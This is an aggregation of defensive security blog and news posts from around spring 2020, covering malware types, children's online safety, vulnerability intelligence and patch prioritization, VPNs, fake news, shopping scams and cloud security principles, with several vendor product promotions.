  • Ransomware- Ransomware is software that holds data hostage, with the threat to publish it or destroy it unless a ransom is paid.


Another popular type of malware that’s been in the news recently is cryptojacking, also called coin mining malware. This malware infects a computer system like a parasite, sucking the processing power to use it to mine for cryptocurrency like Bitcoin. One particularly nasty version of cryptojacking that’s been dominating the web is masquerading as an Adobe Flash update. Cryptojacking can slow down a computer system to a crawl or crash it altogether.

Building Malware Defenses

With all these destructive pieces of malware, how can your organization protect itself? To truly defend your environment, it’s vital to have a solution that guards from as many pieces of malware as possible. For example, antivirus software that only protects a system from viruses can’t block something like the cryptojacking software described above.

Just as Romeo explained to Juliet, you can’t simply rely on name to ensure that your solution is the right one. Since the terms virus and malware have been so often used interchangeably, both anti-malware software and antivirus solutions can both protect against different types of malware. It’s important to focus more on a specific product and what it does, instead of what it’s called.

Powertech Antivirus provides server-level malware protection for organizations running Linux, AIX, and IBM-i. With its robust defenses, it detects and removes viruses, worms, Trojans, and more so you can sleep without fear of unwelcome system visitors. Further, using predictive analysis, Powertech Antivirus detects new pieces of malware before they become widespread, so you’re never caught off guard.





Attribute this content to a different author: 
Bob Erdman
Big text: 
Resource type: 
Protect your IBM Systems from Malware

Get started with a free trial

Top cyber security tips for keeping kids safe online

If you’re among the millions of people working from home while also trying to entertain and educate your kids during the coronavirus pandemic, we imagine things have been pretty chaotic.

Were it not for the option of sitting your kids in front of a laptop for a few hours to do their schoolwork or play games, things might be even worse.

But while the technology gives you a break, do you have complete peace of mind about your children’s safety online? The Internet can be a dangerous place, which is why we talk so often about the importance of secure browsing.

We’re not only talking about parental controls, which, although they help you limit the kinds of activities that kids do online, don’t address a whole range of other threats. Let’s take a look at some of those risks and the things that children should do to stay safe online.

1. Install antivirus software

The first step anyone should take to protect themselves from cyber security threats is to install antivirus software.

These programs are designed to prevent anything nasty from getting onto your device and to alert you when something suspicious appears.

Most computers come with in-built antivirus software (Windows uses a program called Defender, for example), which should be sophisticated enough to tackle with everyday cyber security threats.

However, there are also plenty of programs you can pay for if you’re looking for something more resilient.

Whatever system you use, antivirus software tends to be relatively inobtrusive, running in the background and only popping up when it detects something fishy going on.

The only potential problem is that antivirus software can’t forcibly prevent you from doing anything risky – it simply alerts you to the threat and recommends that you take action.

It’s therefore up to parents to teach children about the importance of these warnings. To the untrained eye, they might be confused with annoying spammy pop-ups that you simply click away from.

Of course, the opposite is true – and it’s only by paying attention to what an antivirus program is telling you that you can prevent a whole lot of trouble down the line.

2. Make sure updates are applied

You’re probably familiar with alerts telling you that software needs to be updated and your computer restarted.

We often think they’re inconvenient, because we want to get on with whatever we were doing. But these updates are important and must be done sooner rather than later, because they improve the software and often patch vulnerabilities that could lead to cyber attacks.

It’s therefore essential that any device your child uses is updated regularly, with patches applied as soon as possible.

3. Watch out for phishing emails

Plenty of people on the Internet claim to be someone they’re not. For example, one of the biggest threats Internet users currently face is phishing.

These are malicious messages that appear to be from a trusted source, but attempt to trick users into handing over sensitive information or downloading malware.

There are two kinds of phishing that children should be concerned about, the first of which are email scams. Although the majority of these end up in spam folders, the more convincing ones can fool these detection tools and land in your kids’ inboxes.

Typical examples of phishing emails include messages supposedly from online services that claim that the recipients’ login information needs to be updated. When you click the link, you’re sent to a bogus version of that site and asked to provide your credentials.

If you do as the site asks, you’re simply handing out your details to them, which they can use to access your account and perhaps even try the same credentials on other accounts.

The other type of phishing scam children should be aware of involves social media, which we take a look at in our next point.

4. Monitor social media activity

Platforms such as Twitter and Reddit have revolutionised the way we think about staying safe online. A generation ago, we were constantly warned about the risks of speaking to strangers over the Internet, but now many websites are designed specifically for that purpose.

Although the majority of those people are harmless, there are still people who take advantage this. One way they do that is through social media phishing scams.

One such scheme works like this: your child sends a tweet to McDonald’s about a promotional offer. A cyber criminal who owns a Twitter account with a name like “McD’s Customer Support” jumps onto the reply and directs your kid to a website that asks them to sign up to receive the latest news, but is actually designed to siphon off their personal details.

You can help your children avoid these risks by teaching them to be careful of any communication that directs them to a website asking them to provide personal details.

When it comes to sites such as Facebook and Instagram, where you’re likely to reveal a lot of information about yourself, it may well be wise to make your account private. That means only people that you’re friends or who follow you can see your profile.

5. Think before handing out personal data

Pretty much every website you visit collects some sort of data about you. This might be relatively harmless information, like tracking cookies that help the website see what links you click and how long you stay on a page, but other practices aren’t as benign.

For example, you might be asked to create an account, in which case you’ll need to submit an email address and password, and maybe even your name, date of birth and other details.

Whenever you provide this information, there is the risk that it will be misused – either intentionally or accidentally.

Say, for instance, the organisation suffered a data breach and the information it collected was leaked online. A cyber criminal could send targeted scams to your child.

Although adults generally understand these risks, children aren’t as aware. It’s therefore up to you to teach them that this type of information is valuable and shouldn’t be shared with just anyone.

The GDPR (General Data Protection Regulation) is a big help here, because it contains added protections regarding the way organisations collect and store children’s personal data.

In the UK, organisations that use consent to collect the personal data of someone under the age of 13 need to seek the approval of someone with “parental responsibility” and take reasonable steps to ensure that the person providing this approval is who they say they are.

This means that if your child is under 13, you’ll always know which organisations are requesting their personal data.

The only exception to the GDPR’s rule is when the information is collected for preventive or counselling services offered directly to the child. The parental figure is often the reason the child is seeking these services, so it makes sense for the organisation to bypass their approval.

Staying secure during the coronavirus pandemic

The pandemic has blurred the lines between your work and home life, and the last thing you need is your kids creating problems that could affect your job.

This will be a significant problem if you don’t have your own work-issued laptop or phone, or if cyber criminals are able to attack your Wi-Fi router.

You should be particularly cautious about letting your children play games or do other potentially dangerous things on devices that you use for work.

This is just one of the reasons why coronavirus presents an unheralded challenge for organisations. It affects all parts of your business and there is no end in sight.

However, what is certain is that it’s more important than ever to remain vigilant and aware of the threats your organisation faces.

One virus is enough to contend with. Make sure you’re prepared to tackle whatever else comes your way with our packaged solutions, which include tools and services to help you address remote working best practices, network vulnerabilities and a host of other issues.

Find out more


The post Top cyber security tips for keeping kids safe online appeared first on IT Governance UK Blog.

Researchers Uncover Novel Way to De-anonymize Device IDs to Users’ Biometrics

Researchers have uncovered a potential means to profile and track online users using a novel approach that combines device identifiers with their biometric information. The details come from a newly published research titled "Nowhere to Hide: Cross-modal Identity Leakage between Biometrics and Devices" by a group of academics from the University of Liverpool, New York University, The Chinese

Coming Soon – “Active Directory Security for Attackers and Defenders”


From the U.S. Department of Defense to the Trillion $ Microsoft Corporation, and from the While House to the Fortune 100, today over 85% of organizations worldwide operate on Microsoft Active Directory.

The cyber security of these foundational Active Directory deployments worldwide is thus paramount to cyber security worldwide, and yet, unfortunately, the Active Directory deployments of most organizations remain alarmingly vulnerable to compromise.

To help thousands of organizations adequately bolster their existing Active Directory security defenses, and to help millions of cyber security and IT personnel worldwide enhance their proficiency in this paramount subject, starting May 05, 2020, I will personally be sharing Active Directory security insights for everyone's benefit, at the Paramount Defenses Blog.

Save the date - May 05, 2020.

Best wishes,

How An Image Could’ve Let Attackers Hack Microsoft Teams Accounts

Microsoft has patched a worm-like vulnerability in its Teams workplace video chat and collaboration platform that could have allowed attackers to take over an organization's entire roster of Teams accounts just by sending participants a malicious link to an innocent-looking image. The flaw, impacting both desktop and web versions of the app, was discovered by cybersecurity researchers at

Webcast: How to Build a Home Lab

This is a joint webcast from Black Hills Information Security and Active Countermeasures. How many of us have tried some new configuration option, utility, or hardware on a production environment, only to crash a critical piece of the business? (me raising hand…) It’s amazing how quickly we learn not to do that! Now we have […]

The post Webcast: How to Build a Home Lab appeared first on Black Hills Information Security.

Putting the Model to Work: Enabling Defenders With Vulnerability Intelligence — Intelligence for Vulnerability Management, Part Four

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Organizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.

At FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. 

In this blog post, we’ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.

Functions of Vulnerability Intelligence

Vulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:

Figure 1: Vulnerability intelligence can help with risk assessment and informed decision making

Tailoring Vulnerability Prioritization

We believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.

Figure 2: Patch Prioritization Philosophy

Integration of Vulnerability Intelligence in Internal Workflows

Based on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.

Figure 3: Integration of vulnerability intelligence into internal workflows

Tools and Use Cases for Operationalizing Vulnerability Intelligence

1. Automate Processes by Fusing Intelligence with Internal Data

Automation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant Intelligence API) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (“FIVE”), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.

Security teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that ‘high’ risk vulnerabilities that have an exploitation rating of ‘available,’ ‘confirmed,’ or ‘wide’ must be patched within a set number of days. Of course, the SLA will depend on the company’s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. 

Another potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization’s unique threat profile and business operations.

2. Communicating with Internal Stakeholders

Teams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.

Data-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization’s appropriate use of resources for security given the potential business impact of security incidents.

3. Threat Modeling

Organizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.


The following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.

Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization

The FireEye Intelligence Vulnerability Explorer (“FIVE”) tool is available for customers here. It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.

Figure 4: FIVE Tool for Windows and MacOS

In this scenario, an organization’s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. 

Figure 5: FIVE tool startup screen waiting for file input

Figure 6: FIVE tool after successfully regexing the CVE-IDs from the file

After selecting all CVE-IDs, the user clicked the “Fetch Vulnerabilities” button, causing the application to make the necessary two-stage API call to the Intelligence API.

The output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye’s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.

Figure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports

FIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization’s vulnerability management program.

Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling

CVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.

In cases like these, threat intelligence can help impacted organizations find the “signal” in the “noise” and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.

Example 3: Intelligence Reduces Unnecessary Resource Expenditure — Automating Vulnerability Prioritization and Communications

Another common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.

Take the case of the CVE-2019-12650, originally disclosed on Sept. 25, 2019 with an NVD rating of “High.” Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.

This is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as “low” risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.

Vulnerabilities: Managed

Because we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.

Mandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps—not just patching—to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Additional Resources

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

Mandiant offers Intelligence Capability Development (ICD) services to help organizations optimize their ability to consume, analyze and apply threat intelligence.

The FIVE tool is available on the FireEye Market. It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. 

Mandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.

Weekly Update 188

Weekly Update 188

It's a day late because somehow, even in the current climate, I still find myself with a lot on my plate and the 2am getup yesterday morning didn't leave me much like talking by the usual time I'd record this video came around. Regardless, I haven't missed a week yet and I wasn't going to start today! No great single stories of significance this week but I thought I'd share some insights into how life is gradually returning to a new kind of normal here. We've fared exceptionally well in Australia and I'm conscious many people watching this are in very different situations, this is merely my experience and what my daily life looks like at present.

Weekly Update 188
Weekly Update 188
Weekly Update 188
Weekly Update 188


  1. The COVID19 Australia Twitter account is a great source of empirical data (we're weathering the pandemic exceptionally well down here)
  2. The next workshop I'll be doing is "in" Oslo for NDC in June (this will be my 7th NDC Oslo, just the first one, well, not actually in Oslo!)
  3. Nanoleaf is kinda cool 😎 (I feel like it would be easy to go overboard with these...)
  4. Amazon has won the tender to host data from Australia's COVID-19 tracing app (yes, it's an American company but no, that doesn't matter)
  5. I mentioned "The Belfast Case" as it relates to Microsoft and customer data stored in overseas (that's an important precedent in discussions like these)
  6. Nintendo is at the receiving end of a credential stuffing attack (despite some people claiming their passwords were "strong and unique", it has all the hallmarks of so many incidents that have come before it)
  7. Sponsored by Varonis. SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Connect With Confidence: Benefits of Using a Personal VPN 

Protect your digital life 

The recent surge in work from home is likely accompanied by a corresponding increase in corporate VPN (virtual private network) usage. More and more employees who would typically be connected at the office are using these protected networks to access confidential documents and sites. To some, these corporate VPNs are simply a tunnel into their work lives. But what about the benefits of a personal VPN? What is a VPN exactly, and why use one 

Encrypt your data 

While a home network with a strong password can help set a good foundation for your digital safety, it is worth considering additional privacy fortifications as more devices connect (and perhaps stay connected for longer periods of time)Whether it’s kids taking their classes and gaming online or parents trying to run errands remotely, we want to help you protect your digital life. 

At their cores, a corporate VPN and personal VPN perform the same functions. They encrypt (or scramble) your data when you connect to the Internet and enable you to browse or bank in confidence with your credentials and history protected. Should there be any malicious actors attempting to intercept your web traffic, they would only be able to see garbled content thanks to your VPN’s encryption functionality.  

Need for VPN 

Constant online connection is becoming the new normal as we limit the time we spend outdoors. And, as the number of devices online increases, so does the number of threats.  

With many retailers reducing their physical footprints or even closing entirely, such services have shifted online – whether you prefer it or not. Learn how to navigate this changing digital landscape with the following VPN tips and tricks below.  

One classic cyberattack is the “maninthemiddle,” especially prevalent in places with public Wi-Fi connections such as cafes or open Wi-Fi connections at an apartment buildingMalicious actors take advantage of weak network security to intercept and read potentially sensitive information such as bank login credentials or even credit card information. strong VPN with bank-grade encryption can render this attack useless and help keep sensitive data away from prying eyes.  

Which VPN should I choose? 

Not all VPNs are created equal! Make sure that the service you select meets your needs:  

Browser vs Desktop/Mobile 

A browser-level VPN acts as an extension and will only help protect web traffic on the specific browser it is installed on. While this degree of privacy may work for some users, a device-level VPN such as McAfee® Safe Connect can generally help protect web traffic regardless of browser or application selected.  

Level of Security 

It is important to review each service’s privacy terms before you decide which one to use as your trusted gateway. Some VPN services, especially free ones, implement trackers that record your demographic, location, and system information. You can sometimes refer to third party security audits to help validate these privacy claims.  


Depending on how much you plan to use your VPN, you can consider searching for services that have either limited or unlimited data plans. If you plan to consume multimedia such as streaming video or uploading large files, an unlimited plan may work better for you.  

Variety of locations 

For general use, it is advisable to let your VPN connect to the nearest and fastest server location. But, having a diverse list of countries to choose from will allow you greater flexibility if the server is slow in one location.  

Ease of Use 

Ultimately, you should choose a VPN that’s easy to use and understand. We are all embarking on digital journeys from different places of technical comfort, but consider starting with products that offer a streamlined and simplified experience.  

If you’d like to learn more about VPNs, read more here, or dive into VPNs for Android and iOS

The post Connect With Confidence: Benefits of Using a Personal VPN  appeared first on McAfee Blogs.

Stay Ahead of Misinformation – 5 Ways to Combat Fake News

fake news

Stay ahead of misinformation  5 ways to combat fake news 

 Finding information in this increasingly digital world has never been easier. Our mobile phones dictate top headlines before we even get out of bed, and even our routers can perform complex searches via voice. We see the impact of this easy access on both our consumption and the sharing of informationJust as it’s easy for us to perform a quick search and send the relevant results to our social groups, it’s also simple for bad actors to create and post fake news on seemingly legitimate platforms. In times of uncertainty, it is natural to go online in search of facts, or the latest update. Now is great time to brush up on your digital hygiene and best practices to stay ahead of evolving threats 

Fake news 

As we’ve learned this year, a lot can change very quickly. We all want to stay up to date on worldwide trends, announcements, or even the elections. This expanded focus on current events opens an opportunity for bad actors. Panic-inducing rumors can be labeled as sensational at best. However, there are malicious promises made via phishing scamthat attempt to hook worried and confused consumers into credit card fraud or other payment schemes. Sticking to legitimate news sources is one of the easiest ways to avoid such traps.  

Chain mail craze 

Not only should you validate your personal newsfeed, you should also hold your social networks to this sanitized standard. While well-intentioned, rumors and fake news often spread through the social grapevine e.g. “my friend saw this on WeChat” or “look at what someone sent me on Facebook.” These updates may feel more relatable since we’re hearing them from someone we know, but keep in mind that social media chain mail is often lacking in factual accuracy. By verifying what you’re see against legitimate information sources, you can help family and friends stay both diligent and in the know.  

Dear Sir/Madam” 

Phishing scams also come out in full force during moments of public panic. We’ve seen numerous spoofed emails and text messages that claim to be from local governments, hospitals, or even retailers encouraging targets to take action on urgent items. These notices range from falsified instructions for claiming relief checks to scheduling medical check-upsSome of these phishing emails may be easy to spot as fakes, but the sensitivity of the current environment may cloud our judgment. If you have any doubts about the legitimacy of these messages, you can always reach out to the known institution through official channels to verify.  

Charity imposters 

One of the great things about extraordinary moments like these is the outpouring of compassion and empathy from the global community. Sadlycybercriminals take advantage of this generosity as wellBad actors have stood up fake charity sites and platforms in the name of donating resources to underserved populations or supporting researchIn reality, these may be scams, and any donations received will never see the light of day. It is a best practice to always research charity organizations before you contribute – especially now. 

Protect yourself from misinformation 

Take a look at some tips and tools below that you can use to stay ahead of misinformation: 

  • Exercise caution when taking action on emails, texts, and phone calls from unfamiliar sources. Often these messages impersonate legitimate entities or people we may know – reach out to the sender directly if you have doubts. 
  • Use a free safe browsing extension like McAfee® WebAdvisor that integrates website reputation ratings that can help steer you away from illegitimate news sites. For Chrome users, WebAdvisor will even color-code links in your social media newsfeeds, so you’ll know which ones are safe to click. 
  • Avoid websites with suspicious URLs or designs that look hastily put together. Check to make sure the site has a secure connection and starts with “https” rather than “http.” 
  • Some identity theft protection services include social media monitoring to help make sure your accounts aren’t being used by bad actors to spread fake news. 
  • Parental controls can keep tabs on kids’ screen timehelping limit their time on certain apps or sites that may be more vulnerable to proliferating misinformation. 
  • Consider using a comprehensive security suite to ensure your devices and online accounts are protected. 

The post Stay Ahead of Misinformation – 5 Ways to Combat Fake News appeared first on McAfee Blogs.

Online shopping scams – 7 ways to fight them 

 Be wary of online shopping scams – 7 ways to fight them 


While some of us may be quite skilled at finding miscellaneous gadgets and great deals on apparel onlinerelying on ecommerce platforms for all of our basic household needs is a new challenge. Many of us preferred to shop at brick and mortar retail for certain purchases such as groceries or pharmaceuticals. Now that we’ve turned online for all our shopping needs, online suppliers have struggled to meet the surge in demand for certain goodsopening a new space for third-party sellers and malicious actors to step in. Since the beginning of the year, the Federal Trade Commission (FTC) has already received over 8,400 complaints regarding consumer scamsand the total reported consumer loss weighs in at $5.85 million.  Here are some common scams to be on the lookout for.  

Fake Shopping Websites 

Cybercriminals are quick to take advantage of emerging trends or events.  We’ve already seen numerous fake shopping websites claiming to sell hot ticket items like cleaning supplies that may be sold out elsewhere. In reality, these credit card-collecting scams may deliver counterfeit goods or nothing at all. 

Investment Scams  

This same logic applies for investments as well. Scammers may be posing as budding companies attempting to raise capital to build medical equipment. Others may be advertising non-existent hedge funds with guarantees of high returns post-crisis. Regardless of the promised deliverable, be sure to conduct sufficient research prior to making major investment decisions.  

Miracle Cures 

As Time reports, some sites even promote remedies ranging from colloidal silver to cow manure.” Luckily, the FTC and Food and Drug Administration (FDA) have started cracking down on companies that issue unsupported claims about miracle cures and vaccines.  

Test Kits 

At the time of writing, the FDA has not approved the sale or distribution of any home testing kitsWhile some of these offers have come from legitimate companies that may have relationships with testing labs, most of these have since received and abided to cease and desist notices. Always reference official entities for guidance on testing, such as the CDC (Centers for Disease Control and Prevention) site here 

This doesn’t mean we should halt our online purchasing. If anything, some logistics companies are encouraging us to continue supporting our favorite small retailers through online purchases to keep them afloat in the uncertainty that lies ahead. With many new instances and flavors of cyberattacks popping up overnight, we can help you stay diligent and secure as you adapt to this shift online.

 Shop Safely Online 

Remember to follow the tips below to ensure your safe online shopping efforts are not in vain: 

  • Exercise caution when receiving promotional emails or texts from unknown sources, especially those that make claims too good to be true.  
  • Stay away from unfamiliar ecommerce websites, even if they’re referred by people you know. Some red flags could be nonsensical URLs, misspellings and unprofessional webpage designs. You can also use a free safe browsing extension to help steer you away from illegitimate sites.  
  •  Use a mobile security solution to help you stay secure on your mobile devices with automatic security scans.  
  • Use a VPN (virtual private network) like McAfee® Safe Connect when conducting sensitive transactions – the data encryption can help ensure your personal information stays protected from prying eyes listening in on your web traffic 
  • Consider using an identity theft protection service to help protect, detect, and correct potential breaches in personal information. 
  • Protect your purchases by looking for sites that begin with “https” instead of “http” – a good way to remember this is “S for secure.” 
  • Use a comprehensive security suite to ensure your devices and online accounts are protected.  


The post Online shopping scams – 7 ways to fight them  appeared first on McAfee Blogs.

Principles of a Cloud Migration – Security, The W5H – Episode WHAT?


Teaching you to be a Natural Born Pillar!

Last week, we took you through the “WHO” of securing a cloud migration here, detailing each of the roles involved with implementing a successful security practice during a cloud migration. Read: everyone. This week, I will be touching on the “WHAT” of security; the key principles required before your first workload moves.  The Well-Architected Framework Security Pillar will be the baseline for this article since it thoroughly explains security concepts in a best practice cloud design.

If you are not familiar with the AWS Well-Architected Framework, go google it right now. I can wait. I’m sure telling readers to leave the article they’re currently reading is a cardinal sin in marketing, but it really is important to understand just how powerful this framework is. Wait, this blog is html ready – here’s the link: It consists of five pillars that include best practice information written by architects with vast experience in each area.

Since the topic here is Security, I’ll start by giving a look into this pillar. However, I plan on writing about each and as I do, each one of the graphics above will become a link. Internet Magic!

There are seven principles as a part of the security framework, as follows:

  • Implement a strong identity foundation
  • Enable traceability
  • Apply security at all layers
  • Automate security best practices
  • Protect data in transit and at rest
  • Keep people away from data
  • Prepare for security events

Now, a lot of these principles can be solved by using native cloud services and usually these are the easiest to implement. One thing the framework does not give you is suggestions on how to set up or configure these services. While it might reference turning on multi-factor authentication as a necessary step for your identity and access management policy, it is not on by default. Same thing with file object encryption. It is there for you to use but not necessarily enabled on the ones you create.

Here is where I make a super cool (and free) recommendation on technology to accelerate your learning about these topics. We have a knowledge base with hundreds of cloud rules mapped to the Well-Architected Framework (and others!) to help accelerate your knowledge during and after your cloud migration. Let us take the use case above on multi-factor authentication. Our knowledge base article here details the four R’s: Risk, Reason, Rationale, and References on why MFA is a security best practice.

Starting with a Risk Level and detailing out why this is presents a threat to your configurations is a great way to begin prioritizing findings.  It also includes the different compliance mandates and Well-Architected pillar (obviously Security in this case) as well as descriptive links to the different frameworks to get even more details.

The reason this knowledge base rule is in place is also included. This gives you and your teams context to the rule and helps further drive your posture during your cloud migration. Sample reason is as follows for our MFA Use Case:

“As a security best practice, it is always recommended to supplement your IAM user names and passwords by requiring a one-time passcode during authentication. This method is known as AWS Multi-Factor Authentication and allows you to enable extra security for your privileged IAM users. Multi-Factor Authentication (MFA) is a simple and efficient method of verifying your IAM user identity by requiring an authentication code generated by a virtual or hardware device on top of your usual access credentials (i.e. user name and password). The MFA device signature adds an additional layer of protection on top of your existing user credentials making your AWS account virtually impossible to breach without the unique code generated by the device.”

If Reason is the “what” of the rule, Rationale is the “why” supplying you with the need for adoption.  Again, perfect for confirming your cloud migration path and strategy along the way.

“Monitoring IAM access in real-time for vulnerability assessment is essential for keeping your AWS account safe. When an IAM user has administrator-level permissions (i.e. can modify or remove any resource, access any data in your AWS environment and can use any service or component – except the Billing and Cost Management service), just as with the AWS root account user, it is mandatory to secure the IAM user login with Multi-Factor Authentication.

Implementing MFA-based authentication for your IAM users represents the best way to protect your AWS resources and services against unauthorized users or attackers, as MFA adds extra security to the authentication process by forcing IAM users to enter a unique code generated by an approved authentication device.”

Finally, all the references for each of the risk, reason, and rationale, are included at the bottom which helps provide additional clarity. You’ll also notice remediation steps, the 5th ‘R’ when applicable, which shows you how to actually the correct the problem.

All of this data is included to the community as Trend Micro continues to be a valued security research firm helping the world be safe for exchanging digital information. Explore all the rules we have available in our public knowledge base:

This blog is part of a multi-part series dealing with the principles of a successful cloud migration.  For more information, start at the first post here:

The post Principles of a Cloud Migration – Security, The W5H – Episode WHAT? appeared first on .

Unproven Coronavirus Therapy Proves Cash Cow for Shadow Pharmacies

Many of the same shadowy organizations that pay people to promote male erectile dysfunction drugs via spam and hacked websites recently have enjoyed a surge in demand for medicines used to fight malaria, lupus and arthritis, thanks largely to unfounded suggestions that these therapies can help combat the COVID-19 pandemic.

A review of the sales figures from some of the top pharmacy affiliate programs suggests sales of drugs containing hydroxychloroquine rivaled that of their primary product — generic Viagra and Cialis — and that this as-yet-unproven Coronavirus treatment accounted for as much as 25 to 30 percent of all sales over the past month.

A Google Trends graph depicting the incidence of Web searches for “chloroquine” over the past 90 days.

